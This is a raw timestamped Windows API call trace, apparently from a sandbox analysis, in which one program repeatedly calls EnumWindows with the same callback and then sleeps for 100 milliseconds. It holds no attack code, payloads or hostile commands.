[0238.171] Sleep (dwMilliseconds=0x64) [0238.191] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.191] Sleep (dwMilliseconds=0x64) [0238.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.288] Sleep (dwMilliseconds=0x64) [0238.329] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.329] Sleep (dwMilliseconds=0x64) [0238.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.363] Sleep (dwMilliseconds=0x64) [0238.371] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.372] Sleep (dwMilliseconds=0x64) [0238.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.408] Sleep (dwMilliseconds=0x64) [0238.444] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.445] Sleep (dwMilliseconds=0x64) [0238.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.450] Sleep (dwMilliseconds=0x64) [0238.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.485] Sleep (dwMilliseconds=0x64) [0238.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.522] Sleep (dwMilliseconds=0x64) [0238.552] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.571] Sleep (dwMilliseconds=0x64) [0238.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.609] Sleep (dwMilliseconds=0x64) [0238.649] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.650] Sleep (dwMilliseconds=0x64) [0238.653] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.653] Sleep (dwMilliseconds=0x64) [0238.690] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.691] Sleep (dwMilliseconds=0x64) [0238.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.733] Sleep (dwMilliseconds=0x64) [0238.779] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.780] Sleep (dwMilliseconds=0x64) [0238.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.800] Sleep (dwMilliseconds=0x64) [0238.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.845] Sleep (dwMilliseconds=0x64) [0238.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.880] Sleep (dwMilliseconds=0x64) [0238.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.887] Sleep (dwMilliseconds=0x64) [0238.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.924] Sleep (dwMilliseconds=0x64) [0238.961] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.961] Sleep (dwMilliseconds=0x64) [0238.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.968] Sleep (dwMilliseconds=0x64) [0238.998] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0238.999] Sleep (dwMilliseconds=0x64) [0239.035] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.035] Sleep (dwMilliseconds=0x64) [0239.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.053] Sleep (dwMilliseconds=0x64) [0239.073] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.073] Sleep (dwMilliseconds=0x64) [0239.110] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.110] Sleep (dwMilliseconds=0x64) [0239.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.140] Sleep (dwMilliseconds=0x64) [0239.148] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.148] Sleep (dwMilliseconds=0x64) [0239.189] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.189] Sleep (dwMilliseconds=0x64) [0239.245] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.246] Sleep (dwMilliseconds=0x64) [0239.251] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.251] Sleep (dwMilliseconds=0x64) [0239.284] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.285] Sleep (dwMilliseconds=0x64) [0239.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.321] Sleep (dwMilliseconds=0x64) [0239.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.340] Sleep (dwMilliseconds=0x64) [0239.362] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.363] Sleep (dwMilliseconds=0x64) [0239.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.405] Sleep (dwMilliseconds=0x64) [0239.431] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.432] Sleep (dwMilliseconds=0x64) [0239.497] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.498] Sleep (dwMilliseconds=0x64) [0239.544] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.545] Sleep (dwMilliseconds=0x64) [0239.581] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.581] Sleep (dwMilliseconds=0x64) [0239.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.596] Sleep (dwMilliseconds=0x64) [0239.619] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.620] Sleep (dwMilliseconds=0x64) [0239.706] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.706] Sleep (dwMilliseconds=0x64) [0239.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.733] Sleep (dwMilliseconds=0x64) [0239.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.753] Sleep (dwMilliseconds=0x64) [0239.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.792] Sleep (dwMilliseconds=0x64) [0239.837] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.838] Sleep (dwMilliseconds=0x64) [0239.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.840] Sleep (dwMilliseconds=0x64) [0239.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.876] Sleep (dwMilliseconds=0x64) [0239.992] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0239.992] Sleep (dwMilliseconds=0x64) [0240.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.053] Sleep (dwMilliseconds=0x64) [0240.126] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.127] Sleep (dwMilliseconds=0x64) [0240.234] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.234] Sleep (dwMilliseconds=0x64) [0240.264] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.266] Sleep (dwMilliseconds=0x64) [0240.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.339] Sleep (dwMilliseconds=0x64) [0240.394] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.395] Sleep (dwMilliseconds=0x64) [0240.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.455] Sleep (dwMilliseconds=0x64) [0240.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.508] Sleep (dwMilliseconds=0x64) [0240.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.566] Sleep (dwMilliseconds=0x64) [0240.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.677] Sleep (dwMilliseconds=0x64) [0240.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.924] Sleep (dwMilliseconds=0x64) [0240.981] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0240.982] Sleep (dwMilliseconds=0x64) [0241.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.150] Sleep (dwMilliseconds=0x64) [0241.152] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.152] Sleep (dwMilliseconds=0x64) [0241.154] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.154] Sleep (dwMilliseconds=0x64) [0241.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.160] Sleep (dwMilliseconds=0x64) [0241.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.162] Sleep (dwMilliseconds=0x64) [0241.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.168] Sleep (dwMilliseconds=0x64) [0241.170] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.170] Sleep (dwMilliseconds=0x64) [0241.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.175] Sleep (dwMilliseconds=0x64) [0241.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.181] Sleep (dwMilliseconds=0x64) [0241.183] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.184] Sleep (dwMilliseconds=0x64) [0241.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.186] Sleep (dwMilliseconds=0x64) [0241.188] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.189] Sleep (dwMilliseconds=0x64) [0241.194] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.195] Sleep (dwMilliseconds=0x64) [0241.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.238] Sleep (dwMilliseconds=0x64) [0241.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.240] Sleep (dwMilliseconds=0x64) [0241.241] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.242] Sleep (dwMilliseconds=0x64) [0241.245] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.245] Sleep (dwMilliseconds=0x64) [0241.247] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.247] Sleep (dwMilliseconds=0x64) [0241.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.249] Sleep (dwMilliseconds=0x64) [0241.253] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.253] Sleep (dwMilliseconds=0x64) [0241.254] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.255] Sleep (dwMilliseconds=0x64) [0241.257] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.257] Sleep (dwMilliseconds=0x64) [0241.258] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.259] Sleep (dwMilliseconds=0x64) [0241.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.262] Sleep (dwMilliseconds=0x64) [0241.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.267] Sleep (dwMilliseconds=0x64) [0241.271] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.272] Sleep (dwMilliseconds=0x64) [0241.278] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.278] Sleep (dwMilliseconds=0x64) [0241.280] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.281] Sleep (dwMilliseconds=0x64) [0241.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.284] Sleep (dwMilliseconds=0x64) [0241.285] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.285] Sleep (dwMilliseconds=0x64) [0241.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.287] Sleep (dwMilliseconds=0x64) [0241.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.292] Sleep (dwMilliseconds=0x64) [0241.297] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.297] Sleep (dwMilliseconds=0x64) [0241.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.301] Sleep (dwMilliseconds=0x64) [0241.303] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.303] Sleep (dwMilliseconds=0x64) [0241.305] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.306] Sleep (dwMilliseconds=0x64) [0241.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.307] Sleep (dwMilliseconds=0x64) [0241.309] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.310] Sleep (dwMilliseconds=0x64) [0241.311] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.311] Sleep (dwMilliseconds=0x64) [0241.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.313] Sleep (dwMilliseconds=0x64) [0241.317] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.317] Sleep (dwMilliseconds=0x64) [0241.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.319] Sleep (dwMilliseconds=0x64) [0241.320] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.321] Sleep (dwMilliseconds=0x64) [0241.322] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.322] Sleep (dwMilliseconds=0x64) [0241.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.324] Sleep (dwMilliseconds=0x64) [0241.326] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.326] Sleep (dwMilliseconds=0x64) [0241.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.328] Sleep (dwMilliseconds=0x64) [0241.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.330] Sleep (dwMilliseconds=0x64) [0241.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.332] Sleep (dwMilliseconds=0x64) [0241.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.334] Sleep (dwMilliseconds=0x64) [0241.336] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.336] Sleep (dwMilliseconds=0x64) [0241.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.338] Sleep (dwMilliseconds=0x64) [0241.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.340] Sleep (dwMilliseconds=0x64) [0241.342] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.342] Sleep (dwMilliseconds=0x64) [0241.343] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.344] Sleep (dwMilliseconds=0x64) [0241.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.346] Sleep (dwMilliseconds=0x64) [0241.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.350] Sleep (dwMilliseconds=0x64) [0241.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.353] Sleep (dwMilliseconds=0x64) [0241.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.355] Sleep (dwMilliseconds=0x64) [0241.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.357] Sleep (dwMilliseconds=0x64) [0241.359] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.360] Sleep (dwMilliseconds=0x64) [0241.362] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.363] Sleep (dwMilliseconds=0x64) [0241.463] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.463] Sleep (dwMilliseconds=0x64) [0241.475] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.476] Sleep (dwMilliseconds=0x64) [0241.516] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.517] Sleep (dwMilliseconds=0x64) [0241.553] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.553] Sleep (dwMilliseconds=0x64) [0241.557] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.557] Sleep (dwMilliseconds=0x64) [0241.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.595] Sleep (dwMilliseconds=0x64) [0241.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.634] Sleep (dwMilliseconds=0x64) [0241.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.651] Sleep (dwMilliseconds=0x64) [0241.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.673] Sleep (dwMilliseconds=0x64) [0241.709] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.710] Sleep (dwMilliseconds=0x64) [0241.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.743] Sleep (dwMilliseconds=0x64) [0241.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.749] Sleep (dwMilliseconds=0x64) [0241.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.785] Sleep (dwMilliseconds=0x64) [0241.944] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.947] Sleep (dwMilliseconds=0x64) [0241.995] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0241.996] Sleep (dwMilliseconds=0x64) [0242.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.032] Sleep (dwMilliseconds=0x64) [0242.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.106] Sleep (dwMilliseconds=0x64) [0242.163] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.284] Sleep (dwMilliseconds=0x64) [0242.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.287] Sleep (dwMilliseconds=0x64) [0242.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.289] Sleep (dwMilliseconds=0x64) [0242.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.292] Sleep (dwMilliseconds=0x64) [0242.293] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.293] Sleep (dwMilliseconds=0x64) [0242.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.295] Sleep (dwMilliseconds=0x64) [0242.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.297] Sleep (dwMilliseconds=0x64) [0242.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.299] Sleep (dwMilliseconds=0x64) [0242.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.301] Sleep (dwMilliseconds=0x64) [0242.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.303] Sleep (dwMilliseconds=0x64) [0242.304] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.305] Sleep (dwMilliseconds=0x64) [0242.306] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.307] Sleep (dwMilliseconds=0x64) [0242.308] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.309] Sleep (dwMilliseconds=0x64) [0242.310] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.311] Sleep (dwMilliseconds=0x64) [0242.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.312] Sleep (dwMilliseconds=0x64) [0242.314] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.314] Sleep (dwMilliseconds=0x64) [0242.319] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.320] Sleep (dwMilliseconds=0x64) [0242.321] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.322] Sleep (dwMilliseconds=0x64) [0242.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.324] Sleep (dwMilliseconds=0x64) [0242.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.326] Sleep (dwMilliseconds=0x64) [0242.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.327] Sleep (dwMilliseconds=0x64) [0242.328] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.329] Sleep (dwMilliseconds=0x64) [0242.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.331] Sleep (dwMilliseconds=0x64) [0242.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.332] Sleep (dwMilliseconds=0x64) [0242.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.334] Sleep (dwMilliseconds=0x64) [0242.336] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.337] Sleep (dwMilliseconds=0x64) [0242.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.338] Sleep (dwMilliseconds=0x64) [0242.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.340] Sleep (dwMilliseconds=0x64) [0242.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.342] Sleep (dwMilliseconds=0x64) [0242.343] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.344] Sleep (dwMilliseconds=0x64) [0242.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.345] Sleep (dwMilliseconds=0x64) [0242.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.350] Sleep (dwMilliseconds=0x64) [0242.352] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.352] Sleep (dwMilliseconds=0x64) [0242.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.354] Sleep (dwMilliseconds=0x64) [0242.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.356] Sleep (dwMilliseconds=0x64) [0242.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.358] Sleep (dwMilliseconds=0x64) [0242.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.365] Sleep (dwMilliseconds=0x64) [0242.367] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.367] Sleep (dwMilliseconds=0x64) [0242.368] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.369] Sleep (dwMilliseconds=0x64) [0242.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.371] Sleep (dwMilliseconds=0x64) [0242.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.373] Sleep (dwMilliseconds=0x64) [0242.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.375] Sleep (dwMilliseconds=0x64) [0242.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.377] Sleep (dwMilliseconds=0x64) [0242.379] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.384] Sleep (dwMilliseconds=0x64) [0242.385] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.386] Sleep (dwMilliseconds=0x64) [0242.387] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.387] Sleep (dwMilliseconds=0x64) [0242.389] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.389] Sleep (dwMilliseconds=0x64) [0242.391] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.391] Sleep (dwMilliseconds=0x64) [0242.393] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.393] Sleep (dwMilliseconds=0x64) [0242.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.395] Sleep (dwMilliseconds=0x64) [0242.397] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.397] Sleep (dwMilliseconds=0x64) [0242.399] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.399] Sleep (dwMilliseconds=0x64) [0242.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.401] Sleep (dwMilliseconds=0x64) [0242.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.403] Sleep (dwMilliseconds=0x64) [0242.405] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.405] Sleep (dwMilliseconds=0x64) [0242.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.407] Sleep (dwMilliseconds=0x64) [0242.408] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.409] Sleep (dwMilliseconds=0x64) [0242.410] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.410] Sleep (dwMilliseconds=0x64) [0242.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.413] Sleep (dwMilliseconds=0x64) [0242.501] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.501] Sleep (dwMilliseconds=0x64) [0242.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.535] Sleep (dwMilliseconds=0x64) [0242.586] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.586] Sleep (dwMilliseconds=0x64) [0242.644] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.644] Sleep (dwMilliseconds=0x64) [0242.798] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.799] Sleep (dwMilliseconds=0x64) [0242.848] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.849] Sleep (dwMilliseconds=0x64) [0242.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.876] Sleep (dwMilliseconds=0x64) [0242.953] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0242.954] Sleep (dwMilliseconds=0x64) [0243.107] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.108] Sleep (dwMilliseconds=0x64) [0243.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.128] Sleep (dwMilliseconds=0x64) [0243.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.178] Sleep (dwMilliseconds=0x64) [0243.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.283] Sleep (dwMilliseconds=0x64) [0243.324] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.325] Sleep (dwMilliseconds=0x64) [0243.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.404] Sleep (dwMilliseconds=0x64) [0243.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.479] Sleep (dwMilliseconds=0x64) [0243.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.548] Sleep (dwMilliseconds=0x64) [0243.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.601] Sleep (dwMilliseconds=0x64) [0243.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.723] Sleep (dwMilliseconds=0x64) [0243.809] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.810] Sleep (dwMilliseconds=0x64) [0243.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.885] Sleep (dwMilliseconds=0x64) [0243.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0243.969] Sleep (dwMilliseconds=0x64) [0244.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.046] Sleep (dwMilliseconds=0x64) [0244.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.107] Sleep (dwMilliseconds=0x64) [0244.153] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.154] Sleep (dwMilliseconds=0x64) [0244.391] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.392] Sleep (dwMilliseconds=0x64) [0244.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.439] Sleep (dwMilliseconds=0x64) [0244.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.508] Sleep (dwMilliseconds=0x64) [0244.634] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.635] Sleep (dwMilliseconds=0x64) [0244.701] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.702] Sleep (dwMilliseconds=0x64) [0244.751] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.752] Sleep (dwMilliseconds=0x64) [0244.837] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.838] Sleep (dwMilliseconds=0x64) [0244.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.924] Sleep (dwMilliseconds=0x64) [0244.967] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0244.968] Sleep (dwMilliseconds=0x64) [0245.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0245.037] Sleep (dwMilliseconds=0x64) [0245.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) 